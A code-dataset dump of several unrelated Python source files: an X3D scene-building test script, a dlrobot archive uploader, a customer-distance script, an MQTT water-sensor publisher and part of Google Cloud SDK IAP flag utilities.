for descriptionField\")\nfield94.setType(\"SFString\")\n\nExternProtoDeclare93.addField(field94)\n\nScene31.addChildren(ExternProtoDeclare93)\n# Tested ArtDeco01ProtoInstance, ArtDeco02ProtoInstance for improper node type when ProtoInstance is added in wrong place \r\nShape95 = x3d.Shape()\nShape95.setDEF(\"TestShape1\")\nAppearance96 = x3d.Appearance()\nAppearance96.setDEF(\"TestAppearance1\")\n# ArtDeco01Material prototype goes here... TODO ensure setContainerField is handled in exported Java \r\nProtoInstance97 = x3d.ProtoInstance()\nProtoInstance97.setName(\"ArtDeco01Material\")\n# [HelloWorldProgram diagnostic] ArtDeco01ProtoInstance.getNodeType()=\\\"Material\\\" \r\nfieldValue98 = x3d.fieldValue()\nfieldValue98.setName(\"description\")\nfieldValue98.setValue(\"ArtDeco01Material can substitute for a Material node\")\n\nProtoInstance97.addFieldValue(fieldValue98)\n\nAppearance96.setMaterial(ProtoInstance97)\n\nShape95.setAppearance(Appearance96)\nSphere99 = x3d.Sphere()\nSphere99.setRadius(0.001)\n\nShape95.setGeometry(Sphere99)\n\nScene31.addChildren(Shape95)\nShape100 = x3d.Shape()\nShape100.setDEF(\"TestShape2\")\nAppearance101 = x3d.Appearance()\nAppearance101.setDEF(\"TestAppearance2\")\n# ArtDeco02Material prototype goes here... TODO ensure setContainerField is handled in exported Java \r\nProtoInstance102 = x3d.ProtoInstance()\nProtoInstance102.setDEF(\"ArtDeco02MaterialDEF\")\nProtoInstance102.setName(\"ArtDeco02Material\")\n# [HelloWorldProgram diagnostic] ArtDeco02ProtoInstance.getNodeType()=\\\"ERROR_UNKNOWN_EXTERNPROTODECLARE_NODE_TYPE: ExternProtoDeclare name='ArtDeco02Material' type cannot be remotely accessed at run time. TODO X3DJSAIL needs to add further capability that retrieves the ExternProtoDeclare file.\\\" \r\nfieldValue103 = x3d.fieldValue()\nfieldValue103.setName(\"description\")\nfieldValue103.setValue(\"ArtDeco02Material can substitute for another Material node\")\n\nProtoInstance102.addFieldValue(fieldValue103)\n\nAppearance101.setMaterial(ProtoInstance102)\n\nShape100.setAppearance(Appearance101)\nCone104 = x3d.Cone()\nCone104.setBottomRadius(0.001)\nCone104.setHeight(0.001)\n\nShape100.setGeometry(Cone104)\n\nScene31.addChildren(Shape100)\nShape105 = x3d.Shape()\nShape105.setDEF(\"TestShape3\")\nAppearance106 = x3d.Appearance()\nAppearance106.setDEF(\"TestAppearance3\")\n# ArtDeco02Material ProtoInstance USE goes here. Note that name field is NOT defined as part of ProtoInstance USE. \r\nProtoInstance107 = x3d.ProtoInstance()\nProtoInstance107.setUSE(\"ArtDeco02MaterialDEF\")\n\nAppearance106.setMaterial(ProtoInstance107)\n\nShape105.setAppearance(Appearance106)\nCylinder108 = x3d.Cylinder()\nCylinder108.setHeight(0.001)\nCylinder108.setRadius(0.001)\n\nShape105.setGeometry(Cylinder108)\n\nScene31.addChildren(Shape105)\nInline109 = x3d.Inline()\nInline109.setDEF(\"inlineSceneDef\")\nInline109.setUrl([\"someOtherScene.x3d\",\"http://www.web3d.org/specifications/java/examples/someOtherScene.x3d\"])\n\nScene31.addChildren(Inline109)\nIMPORT110 = x3d.IMPORT()\nIMPORT110.setAS(\"WorldInfoDEF2\")\nIMPORT110.setImportedDEF(\"WorldInfoDEF\")\nIMPORT110.setInlineDEF(\"inlineSceneDef\")\n\nScene31.addChildren(IMPORT110)\nEXPORT111 = x3d.EXPORT()\nEXPORT111.setAS(\"WorldInfoDEF3\")\nEXPORT111.setLocalDEF(\"WorldInfoDEF\")\n\nScene31.addChildren(EXPORT111)\nProtoDeclare112 = x3d.ProtoDeclare()\nProtoDeclare112.setName(\"MaterialModulator\")\nProtoDeclare112.setAppinfo(\"mimic a Material node and modulate fields as an animation effect\")\nProtoDeclare112.setDocumentation(\"http://x3dgraphics.com/examples/X3dForWebAuthors/Chapter14Prototypes/MaterialModulatorIndex.html\")\nProtoInterface113 = x3d.ProtoInterface()\nfield114 = x3d.field()\nfield114.setName(\"enabled\")\nfield114.setAccessType(\"inputOutput\")\nfield114.setType(\"SFBool\")\nfield114.setValue(\"true\")\n\nProtoInterface113.addField(field114)\nfield115 = x3d.field()\nfield115.setName(\"diffuseColor\")\nfield115.setAccessType(\"inputOutput\")\nfield115.setType(\"SFColor\")\nfield115.setValue(\"0 0 0\")\n\nProtoInterface113.addField(field115)\nfield116 = x3d.field()\nfield116.setName(\"emissiveColor\")\nfield116.setAccessType(\"inputOutput\")\nfield116.setType(\"SFColor\")\nfield116.setValue(\"0.05 0.05 0.5\")\n\nProtoInterface113.addField(field116)\nfield117 = x3d.field()\nfield117.setName(\"specularColor\")\nfield117.setAccessType(\"inputOutput\")\nfield117.setType(\"SFColor\")\nfield117.setValue(\"0 0 0\")\n\nProtoInterface113.addField(field117)\nfield118 = x3d.field()\nfield118.setName(\"transparency\")\nfield118.setAccessType(\"inputOutput\")\nfield118.setType(\"SFFloat\")\nfield118.setValue(\"0.0\")\n\nProtoInterface113.addField(field118)\nfield119 = x3d.field()\nfield119.setName(\"shininess\")\nfield119.setAccessType(\"inputOutput\")\nfield119.setType(\"SFFloat\")\nfield119.setValue(\"0.0\")\n\nProtoInterface113.addField(field119)\nfield120 = x3d.field()\nfield120.setName(\"ambientIntensity\")\nfield120.setAccessType(\"inputOutput\")\nfield120.setType(\"SFFloat\")\nfield120.setValue(\"0.0\")\n\nProtoInterface113.addField(field120)\n\nProtoDeclare112.setProtoInterface(ProtoInterface113)\nProtoBody121 = x3d.ProtoBody()\nMaterial122 = x3d.Material()\nMaterial122.setDEF(\"MaterialNode\")\nIS123 = x3d.IS()\nconnect124 = x3d.connect()\nconnect124.setNodeField(\"diffuseColor\")\nconnect124.setProtoField(\"diffuseColor\")\n\nIS123.addConnect(connect124)\nconnect125 = x3d.connect()\nconnect125.setNodeField(\"emissiveColor\")\nconnect125.setProtoField(\"emissiveColor\")\n\nIS123.addConnect(connect125)\nconnect126 = x3d.connect()\nconnect126.setNodeField(\"specularColor\")\nconnect126.setProtoField(\"specularColor\")\n\nIS123.addConnect(connect126)\nconnect127 = x3d.connect()\nconnect127.setNodeField(\"transparency\")\nconnect127.setProtoField(\"transparency\")\n\nIS123.addConnect(connect127)\nconnect128 = x3d.connect()\nconnect128.setNodeField(\"shininess\")\nconnect128.setProtoField(\"shininess\")\n\nIS123.addConnect(connect128)\nconnect129 = x3d.connect()\nconnect129.setNodeField(\"ambientIntensity\")\nconnect129.setProtoField(\"ambientIntensity\")\n\nIS123.addConnect(connect129)\n\nMaterial122.setIS(IS123)\n\nProtoBody121.addChildren(Material122)\n# Only first node (the node type) is renderable, others are along for the ride \r\nScript130 = x3d.Script()\nScript130.setDEF(\"MaterialModulatorScript\")\nfield131 = x3d.field()\nfield131.setName(\"enabled\")\nfield131.setAccessType(\"inputOutput\")\nfield131.setType(\"SFBool\")\n\nScript130.addField(field131)\nfield132 = x3d.field()\nfield132.setName(\"diffuseColor\")\nfield132.setAccessType(\"inputOutput\")\nfield132.setType(\"SFColor\")\n\nScript130.addField(field132)\nfield133 = x3d.field()\nfield133.setName(\"newColor\")\nfield133.setAccessType(\"outputOnly\")\nfield133.setType(\"SFColor\")\n\nScript130.addField(field133)\nfield134 = x3d.field()\nfield134.setName(\"clockTrigger\")\nfield134.setAccessType(\"inputOnly\")\nfield134.setType(\"SFTime\")\n\nScript130.addField(field134)\nIS135 = x3d.IS()\nconnect136 = x3d.connect()\nconnect136.setNodeField(\"enabled\")\nconnect136.setProtoField(\"enabled\")\n\nIS135.addConnect(connect136)\nconnect137 = x3d.connect()\nconnect137.setNodeField(\"diffuseColor\")\nconnect137.setProtoField(\"diffuseColor\")\n\nIS135.addConnect(connect137)\n\nScript130.setIS(IS135)\n\nScript130.setSourceCode('''\\n\"+\n\"ecmascript:\\n\"+\n\"function initialize ()\\n\"+\n\"{\\n\"+\n\" newColor = diffuseColor; // start with correct color\\n\"+\n\"}\\n\"+\n\"function set_enabled (newValue)\\n\"+\n\"{\\n\"+\n\"\tenabled = newValue;\\n\"+\n\"}\\n\"+\n\"function clockTrigger (timeValue)\\n\"+\n\"{\\n\"+\n\" if (!enabled) return;\\n\"+\n\" red = newColor.r;\\n\"+\n\" green = newColor.g;\\n\"+\n\" blue = newColor.b;\\n\"+\n\" \\n\"+\n\" // note different modulation rates for each color component, % is modulus operator\\n\"+\n\" newColor = new SFColor ((red + 0.02) % 1, (green + 0.03) % 1, (blue + 0.04) % 1);\\n\"+\n\"\tif (enabled)\\n\"+\n\"\t{\\n\"+\n\"\t\tBrowser.print ('diffuseColor=(' + red + ',' + green + ',' + blue + ') newColor=' + newColor.toString() + '\\\\n');\\n\"+\n\"\t}\\n\"+\n\"}\\n\"+\n\"''')\n\nProtoBody121.addChildren(Script130)\n\nProtoDeclare112.setProtoBody(ProtoBody121)\n\nScene31.addChildren(ProtoDeclare112)\n# Test success: declarative statement createDeclarativeShapeTests() \r\nGroup138 = x3d.Group()\nGroup138.setDEF(\"DeclarativeGroupExample\")\nShape139 = x3d.Shape()\nMetadataString140 = x3d.MetadataString()\nMetadataString140.setDEF(\"FindableMetadataStringTest\")\nMetadataString140.setName(\"findThisNameValue\")\nMetadataString140.setValue([\"test case\"])\n\nShape139.setMetadata(MetadataString140)\nAppearance141 = x3d.Appearance()\nAppearance141.setDEF(\"DeclarativeAppearanceExample\")\n# DeclarativeMaterialExample gets overridden by subsequently added MaterialModulator ProtoInstance \r\nProtoInstance142 = x3d.ProtoInstance()\nProtoInstance142.setDEF(\"MyMaterialModulator\")\nProtoInstance142.setName(\"MaterialModulator\")\n\nAppearance141.setMaterial(ProtoInstance142)\n\nShape139.setAppearance(Appearance141)\nCone143 = x3d.Cone()\nCone143.setBottom(False)\nCone143.setBottomRadius(0.05)\nCone143.setHeight(0.1)\n\nShape139.setGeometry(Cone143)\n\nGroup138.addChildren(Shape139)\n# Test success: declarativeGroup.addChild() singleton pipeline method \r\n\nScene31.addChildren(Group138)\n# Test success: declarative statement addChild() \r\n# Test success: x3dModel.findNodeByDEF(DeclarativeAppearanceExample) = i.e. \r\n# Test success: x3dModel.findElementByNameValue(findThisNameValue) = \r\n# Test success: x3dModel.findElementByNameValue(\\\"ArtDeco01Material\\\", \\\"ProtoDeclare\\\") found \r\n# Test success: x3dModel.findElementByNameValue(\\\"MaterialModulator\\\", \\\"ProtoDeclare\\\") found \r\n# Test success: x3dModel.findElementByNameValue(\\\"MaterialModulator\\\", \\\"ProtoInstance\\\") found \r\nGroup144 = x3d.Group()\nGroup144.setDEF(\"TestFieldObjectsGroup\")\n# testFieldObjects() results \r\n# SFBool default=true, true=true, false=false, negate()=true \r\n# MFBool default=, initial=true false true, negate()=false true false \r\n# SFFloat default=0.0, initial=1.0, setValue(2)=2.0, setValue(3.0f)=3.0, setValue(4.0)=4.0 \r\n# MFFloat default=, initial=1 2 3, append(5)=1 2 3 5, inserts(3,4)(0,0)=0 1 2 3 4 5, append(6)=0 1 2 3 4 5 6, size()=7 \r\n# ... get1Value[3]=3.0, remove[1]=0 2 3 4 5 6, set1Value(0,10)=10 2 3 4 5 6, multiply(2)=20 4 6 8 10 12, clear= \r\n# SFVec3f default=0 0 0, initial=1 2 3, setValue=4 5 6, multiply(2)=8 10 12, normalize()=0.45584232 0.5698029 0.68376344, regex matches()=true \r\n# regex test SFVec3f().matches(\\\"1 2 3\\\")=true, regex test SFVec3f().matches(\\\"1 2 3 4\\\")=false, regex test (SFRotationObject.matches(\\\"0 0 0 0\\\")=true, failure detecting illegal (zero axis) rotation value \r\n\nScene31.addChildren(Group144)\nSound145 = x3d.Sound()\nSound145.setLocation([0,1.6,0])\n# set sound-ellipsoid location height at 1.6m to match typical avatar height \r\nAudioClip146 = x3d.AudioClip()\nAudioClip146.setDescription(\"chimes\")\nAudioClip146.setUrl([\"chimes.wav\",\"http://www.web3d.org/x3d/content/examples/ConformanceNist/Sounds/AudioClip/chimes.wav\"])\n# Scene example fragment from http://www.web3d.org/x3d/content/examples/ConformanceNist/Sounds/AudioClip/default.x3d \r\n\nSound145.setSource(AudioClip146)\n\nScene31.addChildren(Sound145)\nSound147 = x3d.Sound()\nSound147.setLocation([0,1.6,0])\n# set sound-ellipsoid location height at 1.6m to match typical avatar height \r\nMovieTexture148 = x3d.MovieTexture()\nMovieTexture148.setDescription(\"mpgsys.mpg from ConformanceNist suite\")\nMovieTexture148.setUrl([\"mpgsys.mpg\",\"http://www.web3d.org/x3d/content/examples/ConformanceNist/Appearance/MovieTexture/mpgsys.mpg\"])\n# Scene example fragment from http://www.web3d.org/x3d/content/examples/ConformanceNist/Appearance/MovieTexture/mpeg1-systems.x3d \r\n# Expected containerField='source', allowed containerField values=\\\"texture\\\" \\\"source\\\" \\\"back\\\" \\\"bottom\\\" \\\"front\\\" \\\"left\\\" \\\"right\\\" \\\"top\\\" \\\"backTexture\\\" \\\"bottomTexture\\\" \\\"frontTexture\\\" \\\"leftTexture\\\" \\\"rightTexture\\\" \\\"topTexture\\\" \\\"watchList\\\" \r\n\nSound147.setSource(MovieTexture148)\n\nScene31.addChildren(Sound147)\n# Test success: AnchorObject.isNode()=true, siteAnchor.isNode()=true \r\n# Test success: AnchorObject.isStatement()=false, siteAnchor.isStatement()=false \r\n# Test success: ROUTEObject.isNode()=false, orbitPositionROUTE.isNode()=false \r\n# Test success: ROUTEObject.isStatement()=true, orbitPositionROUTE.isStatement()=true \r\n# Test success: CommentsBlock.isNode()=false, testComments.isNode()=false \r\n# Test failure: CommentsBlock.isStatement()=true, testComments.isStatement()=true \r\nShape149 = x3d.Shape()\nShape149.setDEF(\"ExtrusionShape\")\n# ExampleExtrusion isCrossSectionClosed()=true, crossSection='[1.0, 1.0, 1.0, -1.0, -1.0, -1.0, -1.0, 1.0, 1.0, 1.0]' \r\n# ExampleExtrusion isSpineClosed()=false, spine='[0.0, 0.0, 0.0, 0.0, 1.0, 0.0]' \r\nAppearance150 = x3d.Appearance()\nAppearance150.setDEF(\"TransparentAppearance\")\nMaterial151 = x3d.Material()\nMaterial151.setTransparency(1.0)\n\nAppearance150.setMaterial(Material151)\n\nShape149.setAppearance(Appearance150)\nExtrusion152 = x3d.Extrusion()\nExtrusion152.setDEF(\"ExampleExtrusion\")\n\nShape149.setGeometry(Extrusion152)\n\nScene31.addChildren(Shape149)\nGroup153 = x3d.Group()\n# Test MFNode children array as an ordered list consisting of comments, statements, ProtoInstance and nodes \r\nProtoDeclare154 = x3d.ProtoDeclare()\nProtoDeclare154.setName(\"NewWorldInfo\")\nProtoInterface155 = x3d.ProtoInterface()\nfield156 = x3d.field()\nfield156.setName(\"description\")\nfield156.setAccessType(\"initializeOnly\")\nfield156.setType(\"SFString\")\n\nProtoInterface155.addField(field156)\n\nProtoDeclare154.setProtoInterface(ProtoInterface155)\nProtoBody157 = x3d.ProtoBody()\nWorldInfo158 = x3d.WorldInfo()\n\nProtoBody157.addChildren(WorldInfo158)\n\nProtoDeclare154.setProtoBody(ProtoBody157)\n\nGroup153.addChildren(ProtoDeclare154)\nProtoInstance159 = x3d.ProtoInstance()\nProtoInstance159.setDEF(\"Proto1\")\nProtoInstance159.setName(\"NewWorldInfo\")\nfieldValue160 = x3d.fieldValue()\nfieldValue160.setName(\"description\")\nfieldValue160.setValue(\"testing 1 2 3\")\n\nProtoInstance159.addFieldValue(fieldValue160)\n\nGroup153.addChildren(ProtoInstance159)\nGroup161 = x3d.Group()\nGroup161.setDEF(\"Node2\")\n# intentionally empty \r\n\nGroup153.addChildren(Group161)\nProtoInstance162 = x3d.ProtoInstance()\nProtoInstance162.setDEF(\"Proto3\")\nProtoInstance162.setName(\"NewWorldInfo\")\n\nGroup153.addChildren(ProtoInstance162)\nTransform163 = x3d.Transform()\nTransform163.setDEF(\"Node4\")\n# intentionally empty \r\n\nGroup153.addChildren(Transform163)\n# Test satisfactorily creates MFNode children array as an ordered list with mixed content \r\n\nScene31.addChildren(Group153)\nProtoDeclare164 = x3d.ProtoDeclare()\nProtoDeclare164.setName(\"ShaderProto\")\nProtoBody165 = x3d.ProtoBody()\nProgramShader166 = x3d.ProgramShader()\n\nProtoBody165.addChild(ProgramShader166)\n\nProtoDeclare164.setProtoBody(ProtoBody165)\n\nScene31.addChildren(ProtoDeclare164)\nShape167 = x3d.Shape()\nAppearance168 = x3d.Appearance()\n# Test MFNode shaders array as an ordered list consisting of comments, ProtoInstance and nodes \r\n# Test satisfactorily creates MFNode shaders array as an ordered list with mixed content \r\nProgramShader169 = x3d.ProgramShader()\nProgramShader169.setDEF(\"TestShader1\")\nShaderProgram170 = x3d.ShaderProgram()\nShaderProgram170.setDEF(\"TestShader2\")\n\nProgramShader169.addPrograms(ShaderProgram170)\n\nAppearance168.addShaders(ProgramShader169)\nProtoInstance171 = x3d.ProtoInstance()\nProtoInstance171.setDEF(\"TestShader3\")\nProtoInstance171.setName(\"ShaderProto\")\n\nAppearance168.addChild(ProtoInstance171)\nComposedShader172 = x3d.ComposedShader()\nComposedShader172.setDEF(\"TestShader4\")\nShaderPart173 = x3d.ShaderPart()\nShaderPart173.setDEF(\"TestShader5\")\n\nComposedShader172.addParts(ShaderPart173)\n\nAppearance168.addShaders(ComposedShader172)\n\nShape167.setAppearance(Appearance168)\n\nScene31.addChildren(Shape167)\nTransform174 = x3d.Transform()\nTransform174.setDEF(\"SpecialtyNodes\")\nCADLayer175 = x3d.CADLayer()\nCADAssembly176 = x3d.CADAssembly()\nCADPart177 = x3d.CADPart()\nCADFace178 = x3d.CADFace()\n\nCADPart177.addChildren(CADFace178)\n\nCADAssembly176.addChildren(CADPart177)\n\nCADLayer175.addChildren(CADAssembly176)\n\nTransform174.addChildren(CADLayer175)\nEspduTransform179 = x3d.EspduTransform()\nEspduTransform179.setGeoSystem([\"GD\",\"WE\"])\n\nTransform174.addChildren(EspduTransform179)\nReceiverPdu180 = x3d.ReceiverPdu()\nReceiverPdu180.setGeoSystem([\"GD\",\"WE\"])\n\nTransform174.addChildren(ReceiverPdu180)\nSignalPdu181 = x3d.SignalPdu()\nSignalPdu181.setGeoSystem([\"GD\",\"WE\"])\n\nTransform174.addChildren(SignalPdu181)\nTransmitterPdu182 = x3d.TransmitterPdu()\nTransmitterPdu182.setGeoSystem([\"GD\",\"WE\"])\n\nTransform174.addChildren(TransmitterPdu182)\nDISEntityManager183 = x3d.DISEntityManager()\nDISEntityTypeMapping184 = x3d.DISEntityTypeMapping()\n\nDISEntityManager183.addMapping(DISEntityTypeMapping184)\n\nTransform174.addChildren(DISEntityManager183)\nHAnimHumanoid185 = x3d.HAnimHumanoid()\nHAnimHumanoid185.setDEF(\"TestHumanoidDEF\")\nHAnimHumanoid185.setName(\"TestHumanoid\")\nHAnimHumanoid185.setVersion(\"2.0\")\n\nTransform174.addChildren(HAnimHumanoid185)\n\nScene31.addChildren(Transform174)\n\nX3D0.setScene(Scene31)\nX3D0.toFileX3D(\"HelloWorldProgramOutput_ReloadedDOM_RoundTrip.x3d\")\n","sub_path":"HelloWorldProgramOutput_ReloadedDOM.py","file_name":"HelloWorldProgramOutput_ReloadedDOM.py","file_ext":"py","file_size_in_byte":33324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"96884045","text":"from dlrobot.common.central_protocol import DLROBOT_HEADER_KEYS\nfrom common.archives import TDearchiver\nfrom dlrobot.common.robot_project import TRobotProject\nfrom common.logging_wrapper import setup_logging\n\nimport argparse\nimport os\nimport sys\nimport time\nimport http.server\nimport shutil\nimport tarfile\nimport platform\nfrom bs4 import BeautifulSoup\n\n#see add_fns_json_to_html.sh to know how to use it\n\nclass TUnzipper:\n def __init__(self, args):\n self.args = args\n self.working = True\n self.logger = setup_logging(log_file_name=self.args.log_file_name)\n self.setup_environment()\n\n @staticmethod\n def parse_args(arg_list):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--archive\", dest='archive_path', required=True)\n parser.add_argument(\"--server-address\", dest='server_address', default=None,\n help=\"by default read it from environment variable DLROBOT_CENTRAL_SERVER_ADDRESS\")\n parser.add_argument(\"--log-file-name\", dest='log_file_name', required=False, default=\"unzip_archive.log\")\n parser.add_argument(\"--http-put-timeout\", dest='http_put_timeout', required=False, type=int, default=60 * 10)\n parser.add_argument(\"--web-domain\", dest='web_domain', required=True)\n parser.add_argument(\"--wait-after-each-doc\", dest='wait_after_each_doc', type=int, default=1)\n args = parser.parse_args(arg_list)\n return args\n\n def get_url_from_meta_tag(self, html_path, default=None):\n with open(html_path, \"rb\") as inp:\n soup = BeautifulSoup(inp.read(), \"html.parser\")\n for meta_tag in soup.find_all(\"meta\"):\n if meta_tag.attrs.get('name') == 'smartparser_url':\n return meta_tag.attrs.get('content')\n return default\n\n def send_files_to_central(self, files):\n web_domains = list()\n for file_name in files:\n web_domain = self.args.web_domain\n if file_name.endswith('.html'):\n web_domain = self.get_url_from_meta_tag(file_name, self.args.web_domain)\n web_domains.append(web_domain)\n\n robot_project_path = TRobotProject.create_project_from_exported_files(\n self.logger,\n self.args.web_domain,\n files,\n web_domains\n )\n\n headers = {\n DLROBOT_HEADER_KEYS.EXIT_CODE: 0,\n DLROBOT_HEADER_KEYS.PROJECT_FILE: os.path.basename(robot_project_path),\n DLROBOT_HEADER_KEYS.WORKER_HOST_NAME: platform.node(),\n \"Content-Type\": \"application/binary\"\n }\n self.logger.debug(\"send results back for {}\".format(robot_project_path))\n dlrobot_results_file_name = os.path.basename(robot_project_path) + \".tar.gz\"\n project_folder = self.args.web_domain\n with tarfile.open(dlrobot_results_file_name, \"w:gz\") as tar:\n for f in os.listdir(project_folder):\n tar.add(os.path.join(project_folder, f), arcname=f)\n\n self.logger.debug(\n \"created file {} size={}\".format(dlrobot_results_file_name, os.stat(dlrobot_results_file_name).st_size))\n\n max_send_try_count = 3\n for try_id in range(max_send_try_count):\n conn = None\n try:\n conn = http.client.HTTPConnection(self.args.server_address, timeout=self.args.http_put_timeout)\n with open(dlrobot_results_file_name, \"rb\") as inp:\n self.logger.debug(\"put file {} to {}\".format(dlrobot_results_file_name, self.args.server_address))\n conn.request(\"PUT\", dlrobot_results_file_name, inp.read(), headers=headers)\n response = conn.getresponse()\n conn.close()\n conn = None\n self.logger.debug(\"sent dlrobot result file {}, size={}, http_code={}\".format(\n dlrobot_results_file_name,\n os.stat(dlrobot_results_file_name).st_size,\n response.status))\n break\n except Exception as exc:\n self.logger.error('worker got {}'.format(type(exc).__name__))\n self.logger.error('try_id = {} out of {}'.format(try_id, max_send_try_count))\n if conn is not None:\n conn.close()\n if try_id == max_send_try_count - 1:\n self.logger.debug(\"give up, we cannot send the results back, so the results are useless\")\n else:\n sleep_seconds = (try_id + 1) * 180\n self.logger.debug('sleep for {} seconds'.format(sleep_seconds))\n time.sleep(sleep_seconds)\n\n self.logger.debug(\"delete file {}\".format(dlrobot_results_file_name))\n os.unlink(dlrobot_results_file_name)\n shutil.rmtree(project_folder, ignore_errors=True)\n time.sleep(self.args.wait_after_each_doc * len(files))\n\n def ping_central(self):\n self.logger.debug(\"pinging {}\".format(self.args.server_address))\n try:\n conn = http.client.HTTPConnection(self.args.server_address)\n conn.request(\"GET\", \"/ping\")\n response = conn.getresponse()\n self.logger.debug(\"response status = {}\".format(response.status))\n if response.status != http.HTTPStatus.OK:\n self.logger.error(\"dlrobot central does not answer\")\n answer = response.read().decode(\"utf8\").strip()\n conn.close()\n except Exception as exp:\n self.logger.error(exp)\n return False\n if answer != \"pong\":\n self.logger.error(\"ping dlrobot central, answer={}, must be 'pong'\".format(answer))\n return False\n self.logger.debug(\"dlrobot_central is alive\")\n return True\n\n def setup_environment(self):\n self.logger.debug(\"current dir: {}\".format(os.path.realpath(os.path.curdir)))\n if self.args.server_address is None:\n self.args.server_address = os.environ['DLROBOT_CENTRAL_SERVER_ADDRESS']\n self.ping_central()\n\n def dearchive_and_send(self):\n _, ext = os.path.splitext(self.args.archive_path)\n tmp_folder = \"tmp\"\n unzip = TDearchiver(self.logger, tmp_folder)\n cnt = 0\n files = list()\n for archive_index, filename, normalized_file_name in unzip.dearchive_one_archive(ext, self.args.archive_path, \"base\"):\n cnt += 1\n files.append(os.path.abspath(normalized_file_name))\n if cnt >= 1000:\n cnt = 0\n self.send_files_to_central(files)\n files = list()\n if len(files) > 0:\n self.send_files_to_central(files)\n shutil.rmtree(tmp_folder, ignore_errors=True)\n\n\nif __name__ == \"__main__\":\n unzipper = TUnzipper(TUnzipper.parse_args(sys.argv[1:]))\n unzipper.dearchive_and_send()\n","sub_path":"tools/dlrobot/central/scripts/fns/unzip_archive.py","file_name":"unzip_archive.py","file_ext":"py","file_size_in_byte":6928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"191903927","text":"# -*- coding: utf-8 -*-\n\nimport core\nfrom core.customers_wrapper import CustomersWrapper\nfrom core.spatial_point import SpatialPoint\n\n\n\nif __name__ == '__main__':\n\n dublin_office = SpatialPoint(53.3381985, -6.2592576, \"Dublin Office\")\n radius = 100\n\n customers_wrapper = CustomersWrapper()\n customers_nearby = customers_wrapper.get_customers_nearby(dublin_office, radius)\n\n for customer in customers_nearby:\n print (\"Name: {name:20} Id: {user_id}\".format(name = customer.name, user_id = customer.user_id))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"612070371","text":"import i2c_arduino_mod as i2c\nimport time\nimport json\nimport unixtime_api as clock\nfrom mqtt import mqtt\nfrom config import config\nimport datetime\nimport temp as w1temp\n\nph = config.topic\nmqtt_url = config.mqtt_url\ntime_url = config.time_url\nlist_name = config.list_name\ntb = \"topic/tb\"\ntemp = \"topic/temp\"\n\ntb_mqtt = mqtt(tb, mqtt_url)\nph_mqtt = mqtt(ph, mqtt_url)\ntemp_mqtt = mqtt(temp, mqtt_url)\n#sensor type 1 fpr ph, 2 for turbidity\nwhile True:\n ph_value = str(i2c.read_arduino(11, 1))\n tb_value = str(i2c.read_arduino(11, 2))\n temp_value = str(w1temp.read_value())\n current_time = str(clock.getnow(time_url, list_name))\n ph_data = {\"time\": current_time, \"value\": ph_value}\n tb_data = {\"time\": current_time, \"value\": tb_value}\n temp_data = {\"time\": current_time, \"value\": temp_value}\n temp_mqtt.send(json.dumps(temp_data))\n ph_mqtt.send(json.dumps(ph_data))\n tb_mqtt.send(json.dumps(tb_data))\n time.sleep(2)\n\nwhile True:\n try:\n ph_value = str(i2c.read_arduino(11, 1))\n tb_value = str(i2c.read_arduino(11, 2))\n temp_value = temp.read_value()\n current_time = str(clock.getnow(time_url, list_name))\n ph_data = {\"time\": current_time, \"value\": ph_value}\n tb_data = {\"time\": current_time, \"value\": tb_value}\n temp_data = {\"time\": current_time, \"value\": temp_value}\n temp_mqtt.send(json.dumps(temp_data))\n ph_mqtt.send(json.dumps(ph_data))\n tb_mqtt.send(json.dumps(tb_data))\n time.sleep(2)\n except Exception as e:\n print(\"error occured: \")\n print(e)\n time.sleep(2)\n \n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"69851024","text":"# -*- coding: utf-8 -*- #\n# Copyright 2019 Google LLC. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Utils for IAP commands.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.iap import util as iap_api\nfrom googlecloudsdk.calliope import exceptions as calliope_exc\nfrom googlecloudsdk.command_lib.iam import iam_util\nfrom googlecloudsdk.command_lib.iap import exceptions as iap_exc\nfrom googlecloudsdk.core import properties\n\n\nAPP_ENGINE_RESOURCE_TYPE = 'app-engine'\nBACKEND_SERVICES_RESOURCE_TYPE = 'backend-services'\nWEB_RESOURCE_TYPE = 'iap_web'\nCOMPUTE_RESOURCE_TYPE = 'compute'\nORG_RESOURCE_TYPE = 'organization'\nFOLDER_RESOURCE_TYPE = 'folder'\nRESOURCE_TYPE_ENUM = (APP_ENGINE_RESOURCE_TYPE, BACKEND_SERVICES_RESOURCE_TYPE)\nSETTING_RESOURCE_TYPE_ENUM = (APP_ENGINE_RESOURCE_TYPE, WEB_RESOURCE_TYPE,\n COMPUTE_RESOURCE_TYPE, ORG_RESOURCE_TYPE,\n FOLDER_RESOURCE_TYPE)\n\n\ndef AddIapIamResourceArgs(parser):\n \"\"\"Adds flags for an IAP IAM resource.\n\n Args:\n parser: An argparse.ArgumentParser-like object. It is mocked out in order to\n capture some information, but behaves like an ArgumentParser.\n \"\"\"\n group = parser.add_group()\n group.add_argument(\n '--resource-type',\n choices=RESOURCE_TYPE_ENUM,\n help='Resource type of the IAP IAM resource.')\n group.add_argument(\n '--service',\n help='Service name.')\n group.add_argument(\n '--version',\n help='Service version. Should only be specified with '\n '`--resource-type=app-engine`.')\n\n\ndef AddIapResourceArgs(parser):\n \"\"\"Adds flags for an IAP resource.\n\n Args:\n parser: An argparse.ArgumentParser-like object. It is mocked out in order to\n capture some information, but behaves like an ArgumentParser.\n \"\"\"\n group = parser.add_group()\n group.add_argument(\n '--resource-type',\n required=True,\n choices=RESOURCE_TYPE_ENUM,\n help='Resource type of the IAP resource.')\n 